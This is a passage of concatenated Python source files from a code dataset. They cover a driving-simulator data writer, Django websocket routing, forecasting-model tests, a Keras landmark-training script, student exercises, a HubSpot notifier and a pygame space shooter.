control.reverse})\n jsonObj.update({'steer_noise': control_noise.steer})\n jsonObj.update({'throttle_noise': control_noise.throttle})\n jsonObj.update({'brake_noise': control_noise.brake})\n\n fo.write(json.dumps(jsonObj, sort_keys=True, indent=4))\n\n\ndef write_sensor_data(episode_path, data_point_id, sensor_data, sensors_frequency,\n top_crop, bottom_crop, resize_width, resize_height):\n # try:\n # from PIL import Image as PImage\n # except ImportError:\n # raise RuntimeError(\n # 'cannot import PIL, make sure pillow package is installed')\n\n for name, data in sensor_data.items():\n if int(data_point_id) % int((1/sensors_frequency[name])) == 0:\n filename = os.path.join(episode_path, name + '_' + data_point_id.zfill(5))\n if 'Lidar' in name:\n format = '.ply'\n write_lidar_data(data, filename, format)\n else:\n format = '.png'\n write_image_data(data, filename, format,\n top_crop, bottom_crop, resize_width, resize_height)\n \n # data.save_to_disk(os.path.join(episode_path, name + '_' + data_point_id.zfill(5)), format)\n\n\ndef make_dataset_path(dataset_path):\n if not os.path.exists(dataset_path):\n os.makedirs(dataset_path)\n\n\ndef add_metadata(dataset_path, settings_module):\n with open(os.path.join(dataset_path, 'metadata.json'), 'w') as fo:\n jsonObj = {}\n jsonObj.update(settings_module.sensors_yaw)\n jsonObj.update({'fov': settings_module.FOV})\n jsonObj.update({'width': settings_module.WINDOW_WIDTH})\n jsonObj.update({'height': settings_module.WINDOW_HEIGHT})\n jsonObj.update({'lateral_noise_percentage': settings_module.lat_noise_percent})\n jsonObj.update({'longitudinal_noise_percentage': settings_module.long_noise_percent})\n jsonObj.update({'car range': settings_module.NumberOfVehicles})\n jsonObj.update({'pedestrian range': settings_module.NumberOfPedestrians})\n jsonObj.update({'set_of_weathers': settings_module.set_of_weathers})\n fo.write(json.dumps(jsonObj, sort_keys=True, indent=4))\n\ndef add_episode_metadata(dataset_path, episode_number, episode_aspects):\n\n if not os.path.exists(os.path.join(dataset_path, 'episode_' + episode_number)):\n os.mkdir(os.path.join(dataset_path, 'episode_' + episode_number))\n\n with open(os.path.join(dataset_path, 'episode_' + episode_number, 'metadata.json'), 'w') as fo:\n\n jsonObj = {}\n jsonObj.update({'town_name': episode_aspects['town_name']})\n jsonObj.update({'number_of_pedestrian': episode_aspects['number_of_pedestrians']})\n jsonObj.update({'number_of_vehicles': episode_aspects['number_of_vehicles']})\n jsonObj.update({'seeds_pedestrians': episode_aspects['seeds_pedestrians']})\n jsonObj.update({'seeds_vehicles': episode_aspects['seeds_vehicles']})\n jsonObj.update({'weather': episode_aspects['weather']})\n \n poses_str = str(episode_aspects['pose']) \n start_transform_str = str(episode_aspects['player_start_transform']).replace('\\n', '')\n target_transform_str = str(episode_aspects['player_target_transform']).replace('\\n', '')\n \n jsonObj.update({'pose': poses_str })\n jsonObj.update({'player_start_transform': start_transform_str })\n jsonObj.update({'player_target_transform': target_transform_str })\n fo.write(json.dumps(jsonObj, sort_keys=True, indent=4))\n\n\n\ndef add_data_point(measurements, control, control_noise, sensor_data, state,\n dataset_path, episode_number, data_point_id, sensors_frequency,\n top_crop, bottom_crop, resize_width, resize_height):\n\n episode_path = os.path.join(dataset_path, 'episode_' + episode_number)\n if not os.path.exists(os.path.join(dataset_path, 'episode_' + episode_number)):\n os.mkdir(os.path.join(dataset_path, 'episode_' + episode_number))\n write_sensor_data(episode_path, data_point_id, sensor_data, sensors_frequency,\n top_crop, bottom_crop, resize_width, resize_height)\n write_json_measurements(episode_path, data_point_id, measurements, control, control_noise,\n state)\n\n# Delete an episode in the case\ndef delete_episode(dataset_path, episode_number):\n\n shutil.rmtree(os.path.join(dataset_path, 'episode_' + episode_number))","sub_path":"modules/data_writer.py","file_name":"data_writer.py","file_ext":"py","file_size_in_byte":7613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"204713069","text":"from channels.auth import AuthMiddlewareStack\nfrom channels.routing import ProtocolTypeRouter, URLRouter, ChannelNameRouter\n\nfrom django.urls import path, re_path\nfrom cronjob.consumers import DagStatusConsumer, RemoteTailfLogConsumer, LocalTailfLogConsumer\n\napplication = ProtocolTypeRouter({\n 'websocket': AuthMiddlewareStack(\n URLRouter([\n re_path(r'^ws/dagstatus/$', DagStatusConsumer),\n re_path(r'^ws/remotelog/(?P\\S+)/$', RemoteTailfLogConsumer),\n re_path(r'^ws/locallog/(?P\\S+)/$', LocalTailfLogConsumer)\n ])\n ),\n \"channel\": ChannelNameRouter({\n \"remote-log\": RemoteTailfLogConsumer,\n \"local-log\": LocalTailfLogConsumer,\n\n })\n})\n","sub_path":"autocronjob/routing.py","file_name":"routing.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"587374672","text":"import shutil\nimport logging\n\nfrom .base_test_class import DartsBaseTestClass\nfrom ..utils import timeseries_generation as tg\nfrom ..logging import get_logger\n\nlogger = get_logger(__name__)\n\ntry:\n from ..models.nbeats import NBEATSModel\n TORCH_AVAILABLE = True\nexcept ImportError:\n logger.warning('Torch not available. TCN tests will be skipped.')\n TORCH_AVAILABLE = False\n\n\nif TORCH_AVAILABLE:\n class NBEATSModelTestCase(DartsBaseTestClass):\n\n def test_creation(self):\n with self.assertRaises(ValueError):\n # if a list is passed to the `layer_widths` argument, it must have a length equal to `num_stacks`\n NBEATSModel(input_chunk_length=1, output_chunk_length=1, num_stacks=3, layer_widths=[1, 2])\n\n def test_fit(self):\n large_ts = tg.constant_timeseries(length=100, value=1000)\n small_ts = tg.constant_timeseries(length=100, value=10)\n\n # Test basic fit and predict\n model = NBEATSModel(input_chunk_length=1, output_chunk_length=1, n_epochs=10,\n num_stacks=1, num_blocks=1, layer_widths=20)\n model.fit(large_ts[:98])\n pred = model.predict(n=2).values()[0]\n\n # Test whether model trained on one series is better than one trained on another\n model2 = NBEATSModel(input_chunk_length=1, output_chunk_length=1,\n n_epochs=10, num_stacks=1, num_blocks=1, layer_widths=20)\n model2.fit(small_ts[:98])\n pred2 = model2.predict(n=2).values()[0]\n self.assertTrue(abs(pred2 - 10) < abs(pred - 10))\n\n # test short predict\n pred3 = model2.predict(n=1)\n self.assertEqual(len(pred3), 1)\n\n def test_multivariate(self):\n series_multivariate = tg.linear_timeseries(length=100).stack(tg.linear_timeseries(length=100))\n model = NBEATSModel(input_chunk_length=1, output_chunk_length=1,\n n_epochs=10, num_stacks=1, num_blocks=1, layer_widths=20)\n with self.assertRaises(ValueError):\n model.fit(series_multivariate)\n","sub_path":"darts/tests/test_NBEATS.py","file_name":"test_NBEATS.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"575491278","text":"#This file was created by Wayne Dreyer\r\nimport numpy as np \r\n#import DataObject as DataObject\r\n\r\n#Calculates the mean and standard deviation of light intensity in the given image data\r\n\r\n#Takes in a data object, gets the image array from that object and returns the arrays mean as a float\r\ndef meanBrightness(obj):\r\n imageData = obj.getImageData()\r\n data16 = imageData.astype(np.int16) #don't know why prototype code converts data to int16, need to look at output data of dataobject.imagedata()\r\n imageMean = np.mean(data16)\r\n return imageMean\r\n\r\n\r\n#Takes in a data object, gets the image array from that object and returns the arrays standard deviation as a float\r\ndef stdBrightness(obj):\r\n imageData = obj.getImageData()\r\n data16 = imageData.astype(np.int16) #Same as above, converted to int16, awaiting completion of dataobject to view imagedata\r\n imageStd = np.std(data16)\r\n return imageStd\r\n","sub_path":"ImageIntensity.py","file_name":"ImageIntensity.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"405687160","text":"__author__ = 'packet-racket'\n\n'''\nOrganize the calls to each zipcode so that the calls all return a multiple of 5 total results.\nThis includes only calling the minimum number of zipcodes to scan each store. Each zipcode\ncan return results for stores in different zipcodes, so it's possible to mix and match which zipcodes\nare called, even excluding some, in order to achieve this.\n\nThis is incomplete for now.\n'''\n\n","sub_path":"Strategies/OptimalZipcode_Strategy.py","file_name":"OptimalZipcode_Strategy.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"170379421","text":"import keras, datetime\nfrom keras.layers import Input, Dense\nfrom keras.models import Model\nfrom keras.callbacks import TensorBoard, ModelCheckpoint, ReduceLROnPlateau\nfrom keras.applications import mobilenet_v2\nimport numpy as np\n\nimg_size = 224\n# The format of landmarks are 2 * 9, [x-cord][y-cord] * 9 of them.\noutput_size = 18\n\n# For log\nstart = datetime.datetime.now().strftime('%Y_%m_%d_%H_%M_%S')\n\n# Error detection: 'Object arrays cannot be loaded when allow_pickle=False'\n# Preserve the original np.load\n# and set the 'allow_pickle' as True\ntmp_np_load = np.load\nnp.load = lambda *a,**k: tmp_np_load(*a, allow_pickle=True, **k)\n\n# Load .npy datasets\nprint('Loading datasets...')\ndata_00 = np.load('/Users/lim/Desktop/CatHisterizer/dataset/lmks_CAT_00.npy')\ndata_01 = np.load('/Users/lim/Desktop/CatHisterizer/dataset/lmks_CAT_01.npy')\ndata_02 = np.load('/Users/lim/Desktop/CatHisterizer/dataset/lmks_CAT_02.npy')\ndata_03 = np.load('/Users/lim/Desktop/CatHisterizer/dataset/lmks_CAT_03.npy')\ndata_04 = np.load('/Users/lim/Desktop/CatHisterizer/dataset/lmks_CAT_04.npy')\ndata_05 = np.load('/Users/lim/Desktop/CatHisterizer/dataset/lmks_CAT_05.npy')\ndata_06 = np.load('/Users/lim/Desktop/CatHisterizer/dataset/lmks_CAT_06.npy')\nprint('Data loading finished')\n\n# Read the datasets\n# In this exercise, dataset_00 to 05 are assigned for training and only 06 for validation\nprint('Reading datasets...')\nx_train = np.concatenate((data_00.item().get('imgs'),\n data_01.item().get('imgs'),\n data_02.item().get('imgs'),\n data_03.item().get('imgs'),\n data_04.item().get('imgs'),\n data_05.item().get('imgs')), axis = 0)\ny_train = np.concatenate((data_00.item().get('lmks'),\n data_01.item().get('lmks'),\n data_02.item().get('lmks'),\n data_03.item().get('lmks'),\n data_04.item().get('lmks'),\n data_05.item().get('lmks')), axis = 0)\nprint('Data reading finished.')\n\n# Start building the model\nprint('Building models...')\nx_test = np.array(data_06.item().get('imgs'))\ny_test = np.array(data_06.item().get('lmks'))\n\nx_train = x_train.astype('float32') / 255.\nx_test = x_test.astype('float32') / 255.\nx_train = np.reshape(x_train, (-1, img_size, img_size, 3))\nx_test = np.reshape(x_test, (-1, img_size, img_size, 3))\n\ny_train = np.reshape(y_train, (-1, output_size))\ny_test = np.reshape(y_test, (-1, output_size))\n\ninputs = Input(shape=(img_size, img_size, 3))\n\n# Pretrained model\nmobilenet_model = mobilenet_v2.MobileNetV2(input_shape=(img_size, img_size, 3),\n alpha=1.0,\n include_top=False,\n weights='imagenet',\n input_tensor=inputs,\n pooling='max')\n\nnet = Dense(128, activation='relu')(mobilenet_model.layers[-1].output)\nnet = Dense(64, activation='relu')(net)\nnet = Dense(output_size, activation='linear')(net)\n\nmodel = Model(inputs=inputs, outputs=net)\n\nmodel.summary()\nprint('Building finished.')\n\n# Start training\nprint('Training models...')\nmodel.compile(optimizer=keras.optimizers.Adam(), loss='mse')\n\nmodel.fit(x_train, y_train,\n epochs=50,\n batch_size=32,\n shuffle=True,\n validation_data=(x_test, y_test),\n verbose=1,\n callbacks=[\n TensorBoard(log_dir='/Users/lim/Desktop/CatHisterizer/logs/%s' % (start)),\n ModelCheckpoint('/Users/lim/Desktop/CatHisterizer/models/%s.h5' % (start), monitor='val_loss', verbose=1, save_best_only=True, mode='auto'),\n ReduceLROnPlateau(monitor='val_lose', factor=0.2, patience=5, verbose=1, mode='auto')\n ]\n )\nprint('Training finished.')\n","sub_path":"secondTraining.py","file_name":"secondTraining.py","file_ext":"py","file_size_in_byte":3893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"520060067","text":"\"\"\"KT2 (R10).\"\"\"\n\n\ndef switch_lasts_and_firsts(s: str) -> str:\n \"\"\"\n Move last two characters to the beginning of string and first two characters to the end of string.\n\n When string length is smaller than 4, return reversed string.\n\n switch_lasts_and_firsts(\"ambulance\") => \"cebulanam\"\n switch_lasts_and_firsts(\"firetruck\") => \"ckretrufi\"\n switch_lasts_and_firsts(\"car\") => \"rac\"\n\n :param s:\n :return: modified string\n \"\"\"\n if len(s) < 4:\n return s[::-1]\n else:\n new_s = s[-2] + s[-1] + s[2:-2] + s[:2]\n return new_s\n\n\ndef has_seven(nums):\n \"\"\"\n Given a list if ints, return True if the value 7 appears in the list exactly 3 times and no consecutive elements have the same value.\n\n has_seven([1, 2, 3]) => False\n has_seven([7, 1, 7, 7]) => False\n has_seven([7, 1, 7, 1, 7]) => True\n has_seven([7, 1, 7, 1, 1, 7]) => False\n \"\"\"\n if 7 not in nums:\n return False\n increment = 0\n for i in nums:\n if i == 7:\n increment += + 1\n else:\n increment = increment\n if increment == 3:\n for i in range(len(nums) - 1):\n print(i)\n if nums[i] != nums[i + 1]:\n print(nums[i])\n return True\n else:\n return False\n else:\n return False\n\n\ndef g_happy(s):\n \"\"\"\n We'll say that a lowercase 'g' in a string is \"happy\" if there is another 'g' immediately to its left or right.\n\n Return True if all the g's in the given string are happy.\n\n g_happy(\"xxggxx\") => True\n g_happy(\"xxgxx\") => False\n g_happy(\"xxggyygxx\") => False\n \"\"\"\n if \"g\" not in s:\n return False\n else:\n for i in range(len(s)):\n if s[i] == \"g\":\n if \"g\" == s[i + 1]:\n return True\n else:\n return False\n","sub_path":"kt2/exam.py","file_name":"exam.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"643365867","text":"# -*- coding: utf-8 -*-\nimport re\nfrom datetime import datetime\nimport pytz\nfrom tzwhere import tzwhere\nfrom dateutil import tz\nfrom bs4 import BeautifulSoup\nimport requests\nimport urllib\nimport json\n\ndef dms2dd(dms):\n \"\"\"(str) -> tuple of float\n Convert a coordinates in degree minute seconds to decimal, returns a tuple of two numbers: lat and lng\"\"\"\n \n coords = dms.split(\" \")[:2]\n l = []\n\n for i in coords:\n i = i.strip()\n \n # get degree, minutes, seconds, direction\n parts = re.split(\"[°′″]+\", i)\n parts[-1] = parts[-1][0]\n dd = float(parts[0]) + float(parts[1])/60 + float(parts[2])/(60*60)\n if parts[3] == \"W\" or parts[3] == \"S\":\n dd = dd*-1\n l.append(dd)\n\n \n return (l[0], l[1])\n\n\ndef sun(location_in_dd):\n \"\"\"(tuple of float) -> tuple of datetime object\n Takes a tuple of decimal coordinates, returns a tuple of local time now (of radio station) sunrise and sunset.\"\"\"\n \n rise_set = requests.get(\"https://api.sunrise-sunset.org/json?lat=\" + str(location_in_dd[0]) \\\n + \"&lng=\" + str(location_in_dd[1]) + \"&date=today&formatted=0\")\n\n \n soup = BeautifulSoup(rise_set.content, \"html.parser\")\n\n #use json to decode json file from API to a dict\n result = json.loads(str(soup))\n \n sunrise = result[\"results\"][\"sunrise\"]\n sunset = result[\"results\"][\"sunset\"]\n sunrise = sunrise[:10] + \" \" + sunrise[11:19]\n sunset = sunset[:10] + \" \" + sunset[11:19]\n \n # get time zone and local time\n time_zone = tzwhere.tzwhere().tzNameAt(location_in_dd[0], location_in_dd[1])\n from_zone = tz.gettz(\"UTC\")\n to_zone = tz.gettz(time_zone)\n\n now = datetime.now(to_zone).time()\n\n rise_utc = datetime.strptime(sunrise, \"%Y-%m-%d %H:%M:%S\")\n rise_local = rise_utc.replace(tzinfo=from_zone).astimezone(to_zone).time()\n \n set_utc = datetime.strptime(sunset, \"%Y-%m-%d %H:%M:%S\")\n set_local = set_utc.replace(tzinfo=from_zone).astimezone(to_zone).time()\n\n result = (now, rise_local, set_local)\n\n return result\n \n","sub_path":"get_info.py","file_name":"get_info.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"627654241","text":"import io\nfrom io import BytesIO\n\nimport requests\nfrom PIL import Image\n\nfrom apps.bot.classes.Demotivator import DemotivatorBuilder\nfrom apps.bot.classes.Exceptions import PWarning\nfrom apps.bot.classes.common.CommonCommand import CommonCommand\nfrom apps.bot.classes.common.CommonMethods import get_attachments_from_attachments_or_fwd\n\n\nclass Demotivator(CommonCommand):\n name = \"демотиватор\"\n help_text = \"создаёт демотиватор\"\n help_texts = [\n \"(Изображения/Пересылаемое сообщение с изображением) (большой текст)[;маленький текст] - создаёт демотиватор\\n\"\n \"Разделитель текста ;\"\n ]\n args = 1\n attachments = ['photo']\n\n def start(self):\n image = get_attachments_from_attachments_or_fwd(self.event, 'photo')[0]\n\n texts = list(map(str.strip, self.event.original_args.split(';')))\n if not texts[0]:\n return \"Первая фраза обязательно должна быть\"\n\n if 'content' in image:\n base_image = Image.open(BytesIO(image['content']))\n elif 'private_download_url' in image:\n response = requests.get(image['private_download_url'])\n base_image = Image.open(BytesIO(response.content))\n else:\n raise PWarning(\"Нет картинки в сообщении\")\n\n db = DemotivatorBuilder(base_image, *texts)\n demotivator = db.get_demotivator()\n img_byte_arr = io.BytesIO()\n demotivator.save(img_byte_arr, format=\"PNG\")\n\n attachments = self.bot.upload_photos(img_byte_arr)\n return {\"attachments\": attachments}\n","sub_path":"apps/bot/commands/Demotivator.py","file_name":"Demotivator.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"570413644","text":"import sys\nimport handler\nimport cleaner\nimport pandas as pd\n\nif __name__ == \"__main__\":\n if (len(sys.argv) < 2):\n print(\"USAGE:\")\n print(sys.argv[0] + \" file1.json [file2.json...]\")\n sys.exit(84)\n questions = handler.getListQuestions(sys.argv[1:], cleaner.softClean)\n histogram = pd.Series(questions).value_counts()\n\n # print(histogram)\n print(\"-------------- BEST30 --------------\")\n print(histogram[:30])\n sys.exit(0)\n","sub_path":"scripting/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"277123231","text":"\"Question3 -A\"\n\n\ndef maximum(liste):\n maxi = liste[-1]\n for n in liste:\n if n > maxi:\n maxi = n\n return maxi\n\n\nprint(maximum([11, 1, 20, 101, 50, 3, 7, 100, 25]))\n\n\"QUESTION 3 -B\"\n\n\n#\ndef chaines():\n sentences = str(input(\"please enter the word or sentences in uppercase:\"))\n sentences = sentences.upper()\n print(sentences.lower())\n\n\"EXMPLE 2\"\npp=\"MASDJDSJNDJDNFEFNSJSCDNSDCOSDNCSDCNJNWDLCN\"\n\ndef p():\n for i in pp :\n print(pp.lower())\n\np()\n\n\"QUESTION 3-D\"\ndef liste():\n responde = int(input(\"enter the number that ypu want make the liste :\"))\n a = [1, 100, 6, 40, 21, 45, responde]\n print(a)\n print(\"do you want to continuos\")\n b = str(input(\"press no to stop or press ys to continuos\"))\n if b==\"yes\":\n #\n #\n responde = int(input(\"enter the number that ypu want make the liste :\"))\n # # a = []\n # # print(a)\n # # print(\"do you want to continuos\")\n # # b = str(input(\"press no to stop or press yes to continuos\"))\n # responde = int(input(\"enter the number that you want make the liste :\"))\n # a1 = []\n # a1.append(responde)\n # c=a+a1\n #\n # print(c)\n # else:\n # if b==\"no\":\n # print('thank you ')\n\n\nliste()\n","sub_path":"DSA WEEK1/Question3.py","file_name":"Question3.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"646110780","text":"###############################################################################\n# _*_ coding: utf-8\nimport json\n\nimport datetime\n\nfrom dateutil.relativedelta import relativedelta\nfrom django.core.management.base import BaseCommand\nfrom django.utils import six\n\nfrom tunga_utils import hubspot_utils\nfrom tunga_utils.models import ExternalEvent\nfrom tunga_utils.notifications.slack import notify_hubspot_deal_changes_slack\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n \"\"\"\n Tunga Notify HubSpot events\n \"\"\"\n # command to run: python manage.py tunga_notify_hubspot_events\n last_12_hours = datetime.datetime.utcnow() - relativedelta(hours=50)\n events = ExternalEvent.objects.filter(notification_sent_at__isnull=True, created_at__gte=last_12_hours)\n\n deal_event_changes = dict()\n deal_event_ids = dict()\n\n for event in events:\n payload = json.loads(event.payload)\n for event_details in type(payload) is list and payload or [payload]:\n subscription_type = event_details.get(hubspot_utils.KEY_SUBSCRIPTION_TYPE)\n if subscription_type in [\n hubspot_utils.KEY_VALUE_DEAL_CREATED,\n hubspot_utils.KEY_VALUE_DEAL_DELETION,\n hubspot_utils.KEY_VALUE_DEAL_PROPERTY_CHANGE\n ]:\n deal_id = event_details.get(hubspot_utils.KEY_OBJECT_ID)\n\n existing_deal_event_ids = deal_event_ids.get(deal_id, [])\n existing_deal_event_payloads = deal_event_changes.get(deal_id, [])\n\n if event.id not in existing_deal_event_ids:\n existing_deal_event_ids.append(event.id)\n existing_deal_event_payloads.append(event_details)\n\n deal_event_ids[deal_id] = existing_deal_event_ids\n deal_event_changes[deal_id] = existing_deal_event_payloads\n\n for deal_id, changes in six.iteritems(deal_event_changes):\n notify_hubspot_deal_changes_slack.delay(deal_id, changes, deal_event_ids.get(deal_id, []))\n","sub_path":"tunga_utils/management/commands/tunga_notify_hubspot_events.py","file_name":"tunga_notify_hubspot_events.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"26078695","text":"\n\nimport pygame # Librería de pygame\nfrom random import randint\nimport time\npygame.font.init()\n\n# Dimensiones de la pantalla\nANCHO = 800\nALTO = 600\n# Colores\nBLANCO = (255, 255, 255) # R,G,B en el rango [0,255], 0 ausencia de color, 255 toda la intensidad\nVERDE_BANDERA = (27, 94, 32) # un poco de rojo, más de verde, un poco de azul\nROJO = (255, 0, 0) # solo rojo, nada de verde, nada de azul\nAZUL = (0, 0, 255) # nada de rojo, ni verde, solo azul\nNEGRO = (0, 0, 0)\n\n#Estado\nMENU = 1\nJUGANDO = 2\nPIERDE=4\nGANA=3\n\n\n# Estructura básica de un programa que usa pygame para dibujar\ndef dibujarPersonaje(ventana, spritePersonaje):\n ventana.blit(spritePersonaje.image, spritePersonaje.rect)\n\n\ndef dibujarEnemigos2(ventana, listaEnemigos2):\n for enemigo2 in listaEnemigos2:\n ventana.blit(enemigo2.image, enemigo2.rect)\n\ndef moverEnemigos2(listaEnemigos2):\n for enemigos2 in listaEnemigos2:\n enemigos2.rect.left -= 1\n\n\ndef dibujarEnemigos(ventana, listaEnemigos):\n for enemigo in listaEnemigos:\n ventana.blit(enemigo.image, enemigo.rect)\n\ndef moverEnemigos(listaEnemigos):\n for enemigos in listaEnemigos:\n enemigos.rect.left -= 1\n\n\ndef dibujarBalas(ventana, listaBalas):\n for bala in listaBalas:\n ventana.blit(bala.image, bala.rect)\n\n\ndef moverBalas(listaBalas):\n for bala in listaBalas:\n bala.rect.left += 30\n\n\n\ndef dibujarMenu(ventana, btnPlay):\n ventana.blit(btnPlay,(300,225)) #medidas btn\n\n\n\ndef dibujarMarcador(ventana, marcador, fuente):\n texto = fuente.render(\"Puntos: \"+ str(marcador), 1, ROJO) #antialiasing suaviza orilla, texto ya es imagen\n ventana.blit(texto, (50,50)) #dupla de cordenadas\n\n\n\ndef verificarColision(listaEnemigos, listaBalas):\n for bala in listaBalas:\n for enemigo in listaEnemigos: #Recorrer con INDICES\n #bala vs enemigo\n xb = bala.rect.left\n yb = bala.rect.bottom\n xe = enemigo.rect.left\n ye = enemigo.rect.bottom\n ae = enemigo.rect.width\n alte = enemigo.rect.height\n if xb >= xe and xb <= xe + ae and yb >= ye and yb <= ye + alte:\n #Golpeo al enemigo\n listaEnemigos.remove(enemigo)\n break\n\ndef checharColisionNave(listaEnemigos2, spritePersonaje, estado):\n destruido = False\n for bala in listaEnemigos2:\n\n #bala vs enemigo\n xb = bala.rect.left\n yb = bala.rect.bottom\n xe = spritePersonaje.rect.left\n ye = spritePersonaje.rect.bottom\n ae = spritePersonaje.rect.width\n alte = spritePersonaje.rect.height\n if xb >= xe and xb <= xe + ae and yb >= ye and yb <= ye + alte:\n #Golpeo al enemigo\n destruido = True\n break\n return destruido\n\ndef dibujar():\n score = 0\n imgGANA = pygame.image.load(\"imgGANA.jpg\")\n imgPIERDE = pygame.image.load(\"imgPIERDE.jpg\")\n fuente = pygame.font.SysFont(\"monospace\", 76)\n # Inicializa el motor de pygame\n pygame.init()\n # Crea una ventana de ANCHO x ALTO\n ventana = pygame.display.set_mode((ANCHO, ALTO)) # Crea la ventana donde dibujará\n reloj = pygame.time.Clock() # Para limitar los fps\n termina = False # Bandera para saber si termina la ejecución, iniciamos suponiendo que no\n\n imgPersonaje = pygame.image.load(\"nave.png\")\n spritePersonaje = pygame.sprite.Sprite()\n spritePersonaje.image = imgPersonaje\n spritePersonaje.rect = imgPersonaje.get_rect()\n spritePersonaje.rect.left = 0\n spritePersonaje.rect.bottom = ALTO // 2 + spritePersonaje.rect.height // 2\n\n\n\n listaEnemigos2 = []\n imgEnemigo2 = pygame.image.load(\"enemigo2.png\")\n\n\n listaEnemigos = []\n imgEnemigo = pygame.image.load(\"enemigo1.png\")\n\n\n\n listaBalas = []\n imgBala = pygame.image.load(\"bala.png\")\n estado = MENU\n\n #Menú\n imgBtnJugar = pygame.image.load(\"botonPlay.png\")\n\n #Fondo\n imgFondo = pygame.image.load(\"fondo.png\")\n\n # Tiempo\n timer = 0 # Acumulador de tiempo\n # Audio\n pygame.mixer.init()\n #pygame.mixer.music.load(\"shoot.wav\")\n #pygame.mixer.music.play(-1)\n efecto = pygame.mixer.Sound(\"shoot.wav\")\n\n while not termina: # Ciclo principal, MIENTRAS la variable termina sea False, el ciclo se repite automáticamente\n # Procesa los eventos que recibe\n for evento in pygame.event.get():\n if evento.type == pygame.QUIT: # El usuario hizo click en el botón de salir\n termina = True # Queremos terminar el ciclo\n elif evento.type == pygame.KEYDOWN:\n if evento.key == pygame.K_UP:\n spritePersonaje.rect.bottom -= 10\n elif evento.key == pygame.K_DOWN:\n spritePersonaje.rect.bottom += 10\n elif evento.key == pygame.K_z:\n spriteBala = pygame.sprite.Sprite()\n spriteBala.image = imgBala\n spriteBala.rect = imgBala.get_rect()\n spriteBala.rect.left = spritePersonaje.rect.left + spritePersonaje.rect.width\n spriteBala.rect.bottom = spritePersonaje.rect.bottom\n listaBalas.append(spriteBala)\n print(len(listaBalas))\n elif evento.type == pygame.MOUSEBUTTONUP:\n xm, ym = pygame.mouse.get_pos() #valores de dubla\n print(xm, \", \", ym)\n xb = ANCHO//2-128\n yb = ALTO//3\n if xm > xb and xm <= xb + 256 and ym >= yb and ym <= yb + 100:\n estado = JUGANDO\n\n\n # Borrar pantalla\n ventana.fill(NEGRO)\n\n if estado == JUGANDO:\n\n\n\n #Tiempo\n if timer >= 1:\n timer = 0\n # Crear una bala\n efecto.play()\n spriteBala = pygame.sprite.Sprite()\n spriteBala.image = imgBala\n spriteBala.rect = imgBala.get_rect()\n spriteBala.rect.left = spritePersonaje.rect.left + spritePersonaje.rect.width\n spriteBala.rect.bottom = spritePersonaje.rect.bottom\n listaBalas.append(spriteBala)\n # ENEMIGOS1\n spriteEnemigo = pygame.sprite.Sprite()\n spriteEnemigo.image = imgEnemigo\n spriteEnemigo.rect = imgEnemigo.get_rect()\n spriteEnemigo.rect.left = randint(0, ANCHO) + ANCHO\n spriteEnemigo.rect.bottom = randint(0, ALTO)\n listaEnemigos.append(spriteEnemigo)\n\n ## ENEMIGOS2\n spriteEnemigo2 = pygame.sprite.Sprite()\n spriteEnemigo2.image = imgEnemigo2\n spriteEnemigo2.rect = imgEnemigo2.get_rect()\n spriteEnemigo2.rect.left = randint(0, ANCHO) + ANCHO\n spriteEnemigo2.rect.bottom = randint(0, ALTO)\n listaEnemigos2.append(spriteEnemigo2)\n\n #Actualizar enemigos\n moverEnemigos(listaEnemigos)\n moverEnemigos2(listaEnemigos2)\n moverBalas(listaBalas)\n verificarColision(listaEnemigos, listaBalas)\n\n\n\n\n\n\n if(checharColisionNave(listaEnemigos2, spritePersonaje, estado) == True):\n estado=PIERDE\n # Dibujar, aquí haces todos los trazos que requieras\n # Normalmente llamas a otra función y le pasas -ventana- como parámetro, por ejemplo, dibujarLineas(ventana)\n # Consulta https://www.pygame.org/docs/ref/draw.html para ver lo que puede hacer draw\n ventana.blit(imgFondo, (0, 0))\n dibujarPersonaje(ventana, spritePersonaje)\n dibujarEnemigos(ventana, listaEnemigos)\n dibujarEnemigos2(ventana, listaEnemigos2)\n dibujarBalas(ventana, listaBalas)\n tiempo = pygame.time.get_ticks()\n score = tiempo\n if tiempo>120000:\n estado=PIERDE\n\n elif estado == MENU:\n #Dinujar menú\n dibujarMenu(ventana, imgBtnJugar)\n\n elif estado == PIERDE:\n ventana.blit(imgPIERDE, (0, 0))\n\n texto = fuente.render(\"Score:\"+str(score/1000), 4, BLANCO)\n ventana.blit(texto, (ANCHO // 2 - 200, ALTO // 4))\n\n\n elif estado == GANA:\n ventana.blit(imgGANA, (0, 0))\n texto = fuente.render(\"¡GANASTE!\", 4, BLANCO)\n ventana.blit(texto, (ANCHO // 2 - 200, ALTO // 4))\n\n\n\n\n\n\n\n pygame.display.flip() # Actualiza trazos (Si no llamas a esta función, no se dibuja)\n reloj.tick(60) # 40 fps\n timer += 1/60\n\n # Después del ciclo principal\n pygame.quit() # termina pygame\n\n\n# Función principal, aquí resuelves el problema\ndef main():\n dibujar() # Por ahora, solo dibuja\n\n# Llamas a la función 